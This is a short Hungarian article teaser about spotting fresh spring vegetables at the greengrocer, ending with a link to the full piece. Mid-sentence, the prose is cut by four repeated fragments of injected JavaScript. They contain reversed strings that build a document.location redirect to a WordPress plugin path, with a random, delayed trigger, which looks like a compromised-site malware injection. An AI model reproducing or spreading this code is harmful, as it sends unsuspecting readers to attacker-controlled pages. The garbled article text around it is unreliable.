Teljesen természetes vágyakozás így tavasztájt, ha az ember szeme már mindenütt a zöldet keresi. Fűben, fában és persze a zöldségesnél is. Friss húsú, roppanós retket szeretnénk enni és lassan újhagymát is libazsíros kenyerünkhöz. Jó lenne már. ha megjelennének a primőr saláták, a természetes napfénynél pirosra és zamatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosra hízott paradicsomok is, a jó ízű paprikák, és persze a méregzöld kígyóuborkát se hagyjuk ki a felsorolásból. Ugye, hogy már látjuk is magunk előtt valamennyit? De vajon mi alapján tudjuk eldönteni, hogy egy zöldségféle igazán friss-e, sikerül-e néhány napig eltartanunk, vagy a vásárlás utáni napon puhán, töttyedten várakozik majd a sorsára? Alapszabály… A…
A cikk folytatódik: http://marmalade.co.hu/mozaik/2018/03/14/mire-figyeljunk-vasarlaskor-honnan-tudjuk-hogy-a-zoldseg-friss-.html
- Hirdetés -